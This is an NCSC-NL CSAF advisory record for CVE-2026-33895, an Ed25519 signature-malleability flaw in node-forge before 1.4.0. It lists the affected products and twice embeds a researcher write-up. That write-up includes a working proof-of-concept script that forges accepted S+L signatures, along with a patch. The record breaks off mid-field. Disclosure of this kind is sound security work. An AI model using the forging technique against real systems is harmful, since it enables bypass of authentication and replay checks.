{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33895", "tracking": { "current_release_date": "2026-03-31T19:39:29.113645Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33895", "initial_release_date": "2026-03-26T22:54:46.938960Z", "revision_history": [ { "date": "2026-03-26T22:54:46.938960Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (6).| CWES updated (1)." }, { "date": "2026-03-26T22:54:50.708949Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-27T00:20:52.050350Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (5).| CWES updated (1)." }, { "date": "2026-03-27T00:20:54.335638Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-27T07:34:56.686996Z", "number": "5", "summary": "NCSC Score updated." }, { "date": "2026-03-28T07:38:05.552034Z", "number": "6", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-28T07:39:04.752053Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (3).| CWES updated (1)." }, { "date": "2026-03-28T07:39:14.786334Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-28T07:40:46.544805Z", "number": "9", "summary": "References created (1)." }, { "date": "2026-03-28T12:28:11.528780Z", "number": "10", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (36).| Product Identifiers created (13).| Product Remediations created (36).| References created (5).| CWES updated (1).| Vendor_assessment created." }, { "date": "2026-03-28T12:28:20.179510Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-29T00:38:38.834552Z", "number": "12", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-29T00:38:49.146847Z", "number": "13", "summary": "NCSC Score updated." }, { "date": "2026-03-31T12:19:56.885861Z", "number": "14", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (2).| CWES updated (1)." }, { "date": "2026-03-31T19:39:07.409593Z", "number": "15", "summary": "Unknown change." } ], "status": "interim", "version": "15" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/4", "product": { "name": "vers:rpm/4", "product_id": "CSAFPID-2552001", "product_identification_helper": { "cpe": "cpe:/a:redhat:cryostat:4" } } } ], "category": "product_name", "name": "Cryostat 4" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/5", "product": { "name": "vers:rpm/5", "product_id": "CSAFPID-1459353", "product_identification_helper": { "cpe": "cpe:/a:redhat:logging:5" } } } ], "category": "product_name", "name": "Logging Subsystem for Red Hat OpenShift" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/2", "product": { "name": "vers:rpm/2", "product_id": "CSAFPID-1508257", "product_identification_helper": { "cpe": "cpe:/a:redhat:ansible_automation_platform:2" } } } ], "category": "product_name", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/1", "product": { "name": "vers:rpm/1", "product_id": "CSAFPID-5940623", "product_identification_helper": { "cpe": "cpe:/a:redhat:podman_desktop:1" } } } ], "category": "product_name", "name": "Red Hat Build of Podman Desktop" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/8", "product": { "name": "vers:rpm/8", "product_id": "CSAFPID-1439292", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_data_grid:8" } } } ], "category": "product_name", "name": "Red Hat Data Grid 8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/10", "product": { "name": "vers:rpm/10", "product_id": "CSAFPID-2858634", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:10" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 10" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/8", "product": { "name": "vers:rpm/8", "product_id": "CSAFPID-1439317", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:8" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/9", "product": { "name": "vers:rpm/9", "product_id": "CSAFPID-1439319", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:9" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/7", "product": { "name": "vers:rpm/7", "product_id": "CSAFPID-1439294", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_fuse:7" } } } ], "category": "product_name", "name": "Red Hat Fuse 7" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/7", "product": { "name": "vers:rpm/7", "product_id": "CSAFPID-1439306", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_enterprise_bpms_platform:7" } } } ], "category": "product_name", "name": "Red Hat Process Automation 7" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/3", "product": { "name": "vers:rpm/3", "product_id": "CSAFPID-1441200", "product_identification_helper": { "cpe": "cpe:/a:redhat:quay:3" } } } ], "category": "product_name", "name": "Red Hat Quay 3" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/4", "product": { "name": "vers:rpm/4", "product_id": "CSAFPID-2467441", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhboac_hawtio:4" } } } ], "category": "product_name", "name": "Red Hat build of Apache Camel - HawtIO 4" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/2", "product": { "name": "vers:rpm/2", "product_id": "CSAFPID-2467443", "product_identification_helper": { "cpe": "cpe:/a:redhat:service_registry:2" } } } ], "category": "product_name", "name": "Red Hat build of Apicurio Registry 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1837472" } } ], "category": "product_name", "name": "automation-eda-controller" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1837473" } } ], "category": "product_name", "name": "automation-gateway" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222698" } } ], "category": "product_name", "name": "automation-platform-ui" } ], "category": "product_family", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5187689" } } ], "category": "product_name", "name": "elasticsearch-operator-bundle" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2914696" } } ], "category": "product_name", "name": "elasticsearch-proxy-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2914697" } } ], "category": "product_name", "name": "elasticsearch-rhel9-operator" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2855724" } } ], "category": "product_name", "name": "elasticsearch6-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1459355" } } ], "category": "product_name", "name": "kibana6-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2855725" } } ], "category": "product_name", "name": "logging-curator5-rhel9" } ], "category": "product_family", "name": "Logging Subsystem for Red Hat OpenShift" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2868420" } } ], "category": "product_name", "name": "grafana" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 10" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1496261" } } ], "category": "product_name", "name": "grafana" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2109953" } } ], "category": "product_name", "name": "pcs" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 9" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2467444" } } ], "category": "product_name", "name": "io.apicurio-apicurio-registry" } ], "category": "product_family", "name": "Red Hat build of Apicurio Registry 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2467448" } } ], "category": "product_name", "name": "io.apicurio-apicurito" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1771999" } } ], "category": "product_name", "name": "io.syndesis-syndesis-parent" } ], "category": "product_family", "name": "Red Hat Fuse 7" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2698055" } } ], "category": "product_name", "name": "io.cryostat-cryostat" } ], "category": "product_family", "name": "Cryostat 4" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2467442" } } ], "category": "product_name", "name": "io.hawt-project" } ], "category": "product_family", "name": "Red Hat build of Apache Camel - HawtIO 4" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2467445" } } ], "category": "product_name", "name": "org.infinispan-infinispan-console" } ], "category": "product_family", "name": "Red Hat Data Grid 8" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2698057" } } ], "category": "product_name", "name": "org.uberfire-uberfire-parent" } ], "category": "product_family", "name": "Red Hat Process Automation 7" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2109952" } } ], "category": "product_name", "name": "pcs" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 8" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5940626" } } ], "category": "product_name", "name": "podman-desktop-macos-1" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5940629" } } ], "category": "product_name", "name": "podman-desktop-windows-1" } ], "category": "product_family", "name": "Red Hat Build of Podman Desktop" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1455906" } } ], "category": "product_name", "name": "quay-rhel8" } ], "category": "product_family", "name": "Red Hat Quay 3" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<1.4.0", "product": { "name": "vers:unknown/<1.4.0", "product_id": "CSAFPID-5956281" } } ], "category": "product_name", "name": "Forge" } ], "category": "vendor", "name": "Digital Bazaar" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:microsoft/*", "product": { "name": "vers:microsoft/*", "product_id": "CSAFPID-5197899", "product_identification_helper": { "cpe": "cpe:2.3:a:microsoft:azl3_python-tensorboard_2.16.2-6:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "azl3 python-tensorboard 2.16.2-6 on Azure Linux 3.0" }, { "branches": [ { "category": "product_version_range", "name": "vers:microsoft/*", "product": { "name": "vers:microsoft/*", "product_id": "CSAFPID-5733329", "product_identification_helper": { "cpe": "cpe:2.3:a:microsoft:cbl2_reaper_3.1.1-22:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "cbl2 reaper 3.1.1-22 on CBL Mariner 2.0" } ], "category": "product_family", "name": "Open Source Software" } ], "category": "vendor", "name": "Microsoft" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=0|<1.4.0", "product": { "name": "vers:unknown/>=0|<1.4.0", "product_id": "CSAFPID-5920253" } } ], "category": "product_name", "name": "node-forge" } ], "category": "vendor", "name": "digitalbazaar" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33895", "cwe": { "id": "CWE-347", "name": "Improper Verification of Cryptographic Signature" }, "notes": [ { "category": "description", "text": "## Summary\nEd25519 signature verification accepts forged non-canonical signatures where the scalar S is not reduced modulo the group order (`S >= L`). A valid signature and its `S + L` variant both verify in forge, while Node.js `crypto.verify` (OpenSSL-backed) rejects the `S + L` variant, [as defined by the specification](https://datatracker.ietf.org/doc/html/rfc8032#section-8.4). This class of signature malleability has been exploited in practice to bypass authentication and authorization logic (see [CVE-2026-25793](https://nvd.nist.gov/vuln/detail/CVE-2026-25793), [CVE-2022-35961](https://nvd.nist.gov/vuln/detail/CVE-2022-35961)). Applications relying on signature uniqueness (i.e., dedup by signature bytes, replay tracking, signed-object canonicalization checks) may be bypassed.\n\n## Impacted Deployments\n**Tested commit:** `8e1d527fe8ec2670499068db783172d4fb9012e5`\n**Affected versions:** tested on v1.3.3 (latest release) and all versions since Ed25519 was implemented.\n\n**Configuration assumptions:**\n- Default forge Ed25519 verify API path (`ed25519.verify(...)`).\n\n\n## Root Cause\nIn `lib/ed25519.js`, `crypto_sign_open(...)` uses the signature's last 32 bytes (`S`) directly in scalar multiplication:\n\n```javascript\nscalarbase(q, sm.subarray(32));\n```\n\nThere is no prior check enforcing `S < L` (Ed25519 group order). As a result, equivalent scalar classes can pass verification, including a modified signature where `S := S + L (mod 2^256)` when that value remains non-canonical. The PoC demonstrates this by mutating only the S half of a valid 64-byte signature.\n\n## Reproduction Steps\n- Use Node.js (tested with `v24.9.0`) and clone `digitalbazaar/forge` at commit `8e1d527fe8ec2670499068db783172d4fb9012e5`.\n- Place and run the PoC script (`poc.js`) with `node poc.js` in the same level as the `forge` folder.\n- The script generates an Ed25519 keypair via forge, signs a fixed message, mutates the signature by adding Ed25519 order L to S (bytes 32..63), and verifies both original and tweaked signatures with forge and Node/OpenSSL (`crypto.verify`).\n- Confirm output includes:\n\n```json\n{\n\t\"forge\": {\n\t\t\"original_valid\": true,\n\t\t\"tweaked_valid\": true\n\t},\n\t\"crypto\": {\n\t\t\"original_valid\": true,\n\t\t\"tweaked_valid\": false\n\t}\n}\n```\n\n## Proof of Concept\n\n**Overview:**\n- Demonstrates a valid control signature and a forged (S + L) signature in one run.\n- Uses Node/OpenSSL as a differential verification baseline.\n- Observed output on tested commit:\n\n```text\n{\n \"forge\": {\n \"original_valid\": true,\n \"tweaked_valid\": true\n },\n \"crypto\": {\n \"original_valid\": true,\n \"tweaked_valid\": false\n }\n}\n```\n\n
poc.js\n\n```javascript\n#!/usr/bin/env node\n'use strict';\n\nconst path = require('path');\nconst crypto = require('crypto');\nconst forge = require('./forge');\nconst ed = forge.ed25519;\n\nconst MESSAGE = Buffer.from('dderpym is the coolest man alive!');\n\n// Ed25519 group order L encoded as 32 bytes, little-endian (RFC 8032).\nconst ED25519_ORDER_L = Buffer.from([\n 0xed, 0xd3, 0xf5, 0x5c, 0x1a, 0x63, 0x12, 0x58,\n 0xd6, 0x9c, 0xf7, 0xa2, 0xde, 0xf9, 0xde, 0x14,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10,\n]);\n\n// For Ed25519 signatures, s is the last 32 bytes of the 64-byte signature.\n// This returns a new signature with s := s + L (mod 2^256), plus the carry.\nfunction addLToS(signature) {\n if (!Buffer.isBuffer(signature) || signature.length !== 64) {\n throw new Error('signature must be a 64-byte Buffer');\n }\n const out = Buffer.from(signature);\n let carry = 0;\n for (let i = 0; i < 32; i++) {\n const idx = 32 + i; // s starts at byte 32 in the 64-byte signature.\n const sum = out[idx] + ED25519_ORDER_L[i] + carry;\n out[idx] = sum & 0xff;\n carry = sum >> 8;\n }\n return { sig: out, carry };\n}\n\nfunction toSpkiPem(publicKeyBytes) {\n if (publicKeyBytes.length !== 32) {\n throw new Error('publicKeyBytes must be 32 bytes');\n }\n // Builds an ASN.1 SubjectPublicKeyInfo for Ed25519 (RFC 8410) and returns PEM.\n const oidEd25519 = Buffer.from([0x06, 0x03, 0x2b, 0x65, 0x70]);\n const algId = Buffer.concat([Buffer.from([0x30, 0x05]), oidEd25519]);\n const bitString = Buffer.concat([Buffer.from([0x03, 0x21, 0x00]), publicKeyBytes]);\n const spki = Buffer.concat([Buffer.from([0x30, 0x2a]), algId, bitString]);\n const b64 = spki.toString('base64').match(/.{1,64}/g).join('\\n');\n return `-----BEGIN PUBLIC KEY-----\\n${b64}\\n-----END PUBLIC KEY-----\\n`;\n}\n\nfunction verifyWithCrypto(publicKey, message, signature) {\n try {\n const keyObject = crypto.createPublicKey(toSpkiPem(publicKey));\n const ok = crypto.verify(null, message, keyObject, signature);\n return { ok };\n } catch (error) {\n return { ok: false, error: error.message };\n }\n}\n\nfunction toResult(label, original, tweaked) {\n return {\n [label]: {\n original_valid: original.ok,\n tweaked_valid: tweaked.ok,\n },\n };\n}\n\nfunction main() {\n const kp = ed.generateKeyPair();\n const sig = ed.sign({ message: MESSAGE, privateKey: kp.privateKey });\n const ok = ed.verify({ message: MESSAGE, signature: sig, publicKey: kp.publicKey });\n const tweaked = addLToS(sig);\n const okTweaked = ed.verify({\n message: MESSAGE,\n signature: tweaked.sig,\n publicKey: kp.publicKey,\n });\n const cryptoOriginal = verifyWithCrypto(kp.publicKey, MESSAGE, sig);\n const cryptoTweaked = verifyWithCrypto(kp.publicKey, MESSAGE, tweaked.sig);\n const result = {\n ...toResult('forge', { ok }, { ok: okTweaked }),\n ...toResult('crypto', cryptoOriginal, cryptoTweaked),\n };\n console.log(JSON.stringify(result, null, 2));\n}\n\nmain();\n```\n
\n\n## Suggested Patch\nAdd strict canonical scalar validation in Ed25519 verify path before scalar multiplication. (Parse S as little-endian 32-byte integer and reject if `S >= L`).\n\nHere is a patch we tested on our end to resolve the issue, though please verify it on your end:\n\n```diff\nindex f3e6faa..87eb709 100644\n--- a/lib/ed25519.js\n+++ b/lib/ed25519.js\n@@ -380,6 +380,10 @@ function crypto_sign_open(m, sm, n, pk) {\n return -1;\n }\n\n+ if(!_isCanonicalSignatureScalar(sm, 32)) {\n+ return -1;\n+ }\n+\n for(i = 0; i < n; ++i) {\n m[i] = sm[i];\n }\n@@ -409,6 +413,21 @@ function crypto_sign_open(m, sm, n, pk) {\n return mlen;\n }\n\n+function _isCanonicalSignatureScalar(bytes, offset) {\n+ var i;\n+ // Compare little-endian scalar S against group order L and require S < L.\n+ for(i = 31; i >= 0; --i) {\n+ if(bytes[offset + i] < L[i]) {\n+ return true;\n+ }\n+ if(bytes[offset + i] > L[i]) {\n+ return false;\n+ }\n+ }\n+ // S == L is non-canonical.\n+ return false;\n+}\n+\n function modL(r, x) {\n var carry, i, j, k;\n for(i = 63; i >= 32; --i) {\n```\n\n## Resources\n\n- RFC 8032 (Ed25519): https://datatracker.ietf.org/doc/html/rfc8032#section-8.4\n - > Ed25519 and Ed448 signatures are not malleable due to the verification check that decoded S is smaller than l\n\n\n## Credit\n\nThis vulnerability was discovered as part of a U.C. Berkeley security research project by: Austin Chu, Sohee Kim, and Corban Villa.", "title": "github - https://api.github.com/advisories/GHSA-q67f-28xg-22rw" }, { "category": "description", "text": "## Summary\nEd25519 signature verification accepts forged non-canonical signatures where the scalar S is not reduced modulo the group order (`S >= L`). A valid signature and its `S + L` variant both verify in forge, while Node.js `crypto.verify` (OpenSSL-backed) rejects the `S + L` variant, [as defined by the specification](https://datatracker.ietf.org/doc/html/rfc8032#section-8.4). This class of signature malleability has been exploited in practice to bypass authentication and authorization logic (see [CVE-2026-25793](https://nvd.nist.gov/vuln/detail/CVE-2026-25793), [CVE-2022-35961](https://nvd.nist.gov/vuln/detail/CVE-2022-35961)). Applications relying on signature uniqueness (i.e., dedup by signature bytes, replay tracking, signed-object canonicalization checks) may be bypassed.\n\n## Impacted Deployments\n**Tested commit:** `8e1d527fe8ec2670499068db783172d4fb9012e5`\n**Affected versions:** tested on v1.3.3 (latest release) and all versions since Ed25519 was implemented.\n\n**Configuration assumptions:**\n- Default forge Ed25519 verify API path (`ed25519.verify(...)`).\n\n\n## Root Cause\nIn `lib/ed25519.js`, `crypto_sign_open(...)` uses the signature's last 32 bytes (`S`) directly in scalar multiplication:\n\n```javascript\nscalarbase(q, sm.subarray(32));\n```\n\nThere is no prior check enforcing `S < L` (Ed25519 group order). As a result, equivalent scalar classes can pass verification, including a modified signature where `S := S + L (mod 2^256)` when that value remains non-canonical. The PoC demonstrates this by mutating only the S half of a valid 64-byte signature.\n\n## Reproduction Steps\n- Use Node.js (tested with `v24.9.0`) and clone `digitalbazaar/forge` at commit `8e1d527fe8ec2670499068db783172d4fb9012e5`.\n- Place and run the PoC script (`poc.js`) with `node poc.js` in the same level as the `forge` folder.\n- The script generates an Ed25519 keypair via forge, signs a fixed message, mutates the signature by adding Ed25519 order L to S (bytes 32..63), and verifies both original and tweaked signatures with forge and Node/OpenSSL (`crypto.verify`).\n- Confirm output includes:\n\n```json\n{\n\t\"forge\": {\n\t\t\"original_valid\": true,\n\t\t\"tweaked_valid\": true\n\t},\n\t\"crypto\": {\n\t\t\"original_valid\": true,\n\t\t\"tweaked_valid\": false\n\t}\n}\n```\n\n## Proof of Concept\n\n**Overview:**\n- Demonstrates a valid control signature and a forged (S + L) signature in one run.\n- Uses Node/OpenSSL as a differential verification baseline.\n- Observed output on tested commit:\n\n```text\n{\n \"forge\": {\n \"original_valid\": true,\n \"tweaked_valid\": true\n },\n \"crypto\": {\n \"original_valid\": true,\n \"tweaked_valid\": false\n }\n}\n```\n\n
poc.js\n\n```javascript\n#!/usr/bin/env node\n'use strict';\n\nconst path = require('path');\nconst crypto = require('crypto');\nconst forge = require('./forge');\nconst ed = forge.ed25519;\n\nconst MESSAGE = Buffer.from('dderpym is the coolest man alive!');\n\n// Ed25519 group order L encoded as 32 bytes, little-endian (RFC 8032).\nconst ED25519_ORDER_L = Buffer.from([\n 0xed, 0xd3, 0xf5, 0x5c, 0x1a, 0x63, 0x12, 0x58,\n 0xd6, 0x9c, 0xf7, 0xa2, 0xde, 0xf9, 0xde, 0x14,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10,\n]);\n\n// For Ed25519 signatures, s is the last 32 bytes of the 64-byte signature.\n// This returns a new signature with s := s + L (mod 2^256), plus the carry.\nfunction addLToS(signature) {\n if (!Buffer.isBuffer(signature) || signature.length !== 64) {\n throw new Error('signature must be a 64-byte Buffer');\n }\n const out = Buffer.from(signature);\n let carry = 0;\n for (let i = 0; i < 32; i++) {\n const idx = 32 + i; // s starts at byte 32 in the 64-byte signature.\n const sum = out[idx] + ED25519_ORDER_L[i] + carry;\n out[idx] = sum & 0xff;\n carry = sum >> 8;\n }\n return { sig: out, carry };\n}\n\nfunction toSpkiPem(publicKeyBytes) {\n if (publicKeyBytes.length !== 32) {\n throw new Error('publicKeyBytes must be 32 bytes');\n }\n // Builds an ASN.1 SubjectPublicKeyInfo for Ed25519 (RFC 8410) and returns PEM.\n const oidEd25519 = Buffer.from([0x06, 0x03, 0x2b, 0x65, 0x70]);\n const algId = Buffer.concat([Buffer.from([0x30, 0x05]), oidEd25519]);\n const bitString = Buffer.concat([Buffer.from([0x03, 0x21, 0x00]), publicKeyBytes]);\n const spki = Buffer.concat([Buffer.from([0x30, 0x2a]), algId, bitString]);\n const b64 = spki.toString('base64').match(/.{1,64}/g).join('\\n');\n return `-----BEGIN PUBLIC KEY-----\\n${b64}\\n-----END PUBLIC KEY-----\\n`;\n}\n\nfunction verifyWithCrypto(publicKey, message, signature) {\n try {\n const keyObject = crypto.createPublicKey(toSpkiPem(publicKey));\n const ok = crypto.verify(null, message, keyObject, signature);\n return { ok };\n } catch (error) {\n return { ok: false, error: error.message };\n }\n}\n\nfunction toResult(label, original, tweaked) {\n return {\n [label]: {\n original_valid: original.ok,\n tweaked_valid: tweaked.ok,\n },\n };\n}\n\nfunction main() {\n const kp = ed.generateKeyPair();\n const sig = ed.sign({ message: MESSAGE, privateKey: kp.privateKey });\n const ok = ed.verify({ message: MESSAGE, signature: sig, publicKey: kp.publicKey });\n const tweaked = addLToS(sig);\n const okTweaked = ed.verify({\n message: MESSAGE,\n signature: tweaked.sig,\n publicKey: kp.publicKey,\n });\n const cryptoOriginal = verifyWithCrypto(kp.publicKey, MESSAGE, sig);\n const cryptoTweaked = verifyWithCrypto(kp.publicKey, MESSAGE, tweaked.sig);\n const result = {\n ...toResult('forge', { ok }, { ok: okTweaked }),\n ...toResult('crypto', cryptoOriginal, cryptoTweaked),\n };\n console.log(JSON.stringify(result, null, 2));\n}\n\nmain();\n```\n
\n\n## Suggested Patch\nAdd strict canonical scalar validation in Ed25519 verify path before scalar multiplication. (Parse S as little-endian 32-byte integer and reject if `S >= L`).\n\nHere is a patch we tested on our end to resolve the issue, though please verify it on your end:\n\n```diff\nindex f3e6faa..87eb709 100644\n--- a/lib/ed25519.js\n+++ b/lib/ed25519.js\n@@ -380,6 +380,10 @@ function crypto_sign_open(m, sm, n, pk) {\n return -1;\n }\n\n+ if(!_isCanonicalSignatureScalar(sm, 32)) {\n+ return -1;\n+ }\n+\n for(i = 0; i < n; ++i) {\n m[i] = sm[i];\n }\n@@ -409,6 +413,21 @@ function crypto_sign_open(m, sm, n, pk) {\n return mlen;\n }\n\n+function _isCanonicalSignatureScalar(bytes, offset) {\n+ var i;\n+ // Compare little-endian scalar S against group order L and require S < L.\n+ for(i = 31; i >= 0; --i) {\n+ if(bytes[offset + i] < L[i]) {\n+ return true;\n+ }\n+ if(bytes[offset + i] > L[i]) {\n+ return false;\n+ }\n+ }\n+ // S == L is non-canonical.\n+ return false;\n+}\n+\n function modL(r, x) {\n var carry, i, j, k;\n for(i = 63; i >= 32; --i) {\n```\n\n## Resources\n\n- RFC 8032 (Ed25519): https://datatracker.ietf.org/doc/html/rfc8032#section-8.4\n - > Ed25519 and Ed448 signatures are not malleable due to the verification check that decoded S is smaller than l\n\n\n## Credit\n\nThis vulnerability was discovered as part of a U.C. Berkeley security research project by: Austin Chu, Sohee Kim, and Corban Villa.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-q67f-28xg-22rw.json?alt=media" }, { "category": "description", "text": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, Ed25519 signature verification accepts forged non-canonical signatures where the scalar S is not reduced modulo the group order (`S >= L`). A valid signature and its `S + L` variant both verify in forge, while Node.js `crypto.verify` (OpenSSL-backed) rejects the `S + L` variant, as defined by the specification. This class of signature malleability has been exploited in practice to bypass authentication and authorization logic (see CVE-2026-25793, CVE-2022-35961). Applications relying on signature uniqueness (i.e., dedup by signature bytes, replay tracking, signed-object canonicalization checks) may be bypassed. Version 1.4.0 patches the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33895" }, { "category": "description", "text": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, Ed25519 signature verification accepts forged non-canonical signatures where the scalar S is not reduced modulo the group order (`S >= L`). A valid signature and its `S + L` variant both verify in forge, while Node.js `crypto.verify` (OpenSSL-backed) rejects the `S + L` variant, as defined by the specification. This class of signature malleability has been exploited in practice to bypass authentication and authorization logic (see CVE-2026-25793, CVE-2022-35961). Applications relying on signature uniqueness (i.e., dedup by signature bytes, replay tracking, signed-object canonicalization checks) may be bypassed. Version 1.4.0 patches the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33895.json" }, { "category": "description", "text": "A 